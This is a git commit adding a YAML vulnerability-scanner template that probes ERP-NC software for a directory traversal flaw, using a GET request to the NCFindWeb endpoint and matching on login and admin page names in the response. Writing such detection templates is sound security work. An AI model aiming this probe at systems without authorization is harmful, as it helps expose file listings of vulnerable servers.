Create erp-nc-directory-traversal.yaml
parent
c19e8aa1cc
commit
98af0ce0cc
|
@ -0,0 +1,26 @@
|
|||
id: erp-nc-directory-traversal
|
||||
|
||||
info:
|
||||
name: ERP-NC directory traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
||||
tags: lfi,erp-nc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Client"
|
||||
- "ncwslogin.jsp"
|
||||
- "admin.jsp"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue